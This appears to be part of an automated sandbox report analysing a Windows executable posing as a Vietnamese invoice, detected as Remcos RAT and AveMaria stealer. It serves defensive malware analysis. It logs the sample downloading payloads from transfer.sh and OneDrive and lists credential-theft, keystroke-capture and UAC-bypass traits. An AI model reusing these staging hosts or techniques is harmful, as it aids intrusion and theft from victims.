Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic	HTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: aspnet_compiler.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

14_2_0041183A

Creates a DirectInput object (often for capturing keystrokes)

Source: Shhejayly.exe, 00000012.00000002.524974268.00000000007CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Too many similar processes found

Source: aspnet_compiler.exe

Process created: 50

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4C114	0_2_00B4C114
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4E558	0_2_00B4E558
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4E548	0_2_00B4E548
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5FB0	0_2_077E5FB0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB620	0_2_077EB620
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E9084	0_2_077E9084
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5FA0	0_2_077E5FA0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB60F	0_2_077EB60F
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB5C3	0_2_077EB5C3
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E63CF	0_2_077E63CF
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EA244	0_2_077EA244
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5068	0_2_077E5068
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5059	0_2_077E5059
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E0040	0_2_077E0040
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E003E	0_2_077E003E
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_078C83A0	0_2_078C83A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10017194	12_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B040	14_2_0044B040
